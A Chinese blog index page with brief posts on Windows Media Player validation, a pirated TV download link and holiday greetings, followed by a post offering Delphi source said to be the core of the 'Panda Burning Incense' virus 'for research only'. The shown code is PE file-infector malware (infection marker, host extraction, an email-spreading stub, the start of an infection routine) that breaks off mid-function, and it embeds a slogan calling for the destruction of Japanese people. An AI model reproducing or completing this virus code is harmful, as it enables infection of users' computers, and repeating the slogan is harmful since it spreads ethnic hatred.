分页: 1/5 第一页 1 2 3 4 5 下页 最后页 [ 显示模式: 摘要 | 列表 ]
 升级安装windoes media player 11 出现的问题
【验证你的windows副本】

解决方法:
Tags: , , ,
请使用迅雷复制下面地址
thunder://QUFodHRwOi8vZGF0NS51dWJpcmQuY29tL2RhdGEvcHJpc29uLWJyZWFrLXMyMThjbihiYnMudXViaXJkLmNvbSkucm12Ylpa


最新更新请见此贴,内有越狱第二季全集,迅雷下载,BT下载


http://www.swuyc.com/bbs/thread-4588-1-1.html
Tags: ,
Tags: ,
Tags: , ,

 
祝大家新年快乐!
Tags:
Tags: ,

Highslide JS



   乔布斯称,在设计这款有史以来最酷的设备过程中,苹果也许是太过于谨小慎微了,以至于竟然漏掉了所有的电话都应该具备的最重要的功能。
   
Tags: , ,
熊猫烧香 - 核心源码 Delphi版本
------------------------------------
仅供研究使用!后果自行負責
代码:

program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432;         //病毒体的大小
IconOffset = $12EB8;       //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912;         //Upx压缩过病毒体的大小
IconOffset = $92BC;         //Upx压缩过PE文件主图标的偏移量



//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize   = $2E8;         //PE文件主图标的大小--744字节
IconTail   = IconOffset + IconSize; //PE文件主图标的尾部
ID     = $44444444;       //感染标记

//我非常爱你码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
   'If a country need to be destroyed, it must be Japan! ' +
   '*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;  
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si:   STARTUPINFO;
Pi:   PROCESS_INFORMATION;
IsJap:   Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
 dStream := TFileStream.Create(FileName, fmCreate);
 try
 sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
 dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
 finally
 dStream.Free;
 end;
finally
 sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?汤姆感激不尽!
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
 Exit;
Infected := False;
IsPE   := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
 for i := 0 to $108 do //检查PE文件头
 begin

分页: 1/5 第一页 1 2 3 4 5 下页 最后页 [ 显示模式: 摘要 | 列表 ]
Powered by Bo-Blog 2.1.1 ReleaseCode detection by Bug.Center.Team
浙ICP备07004806号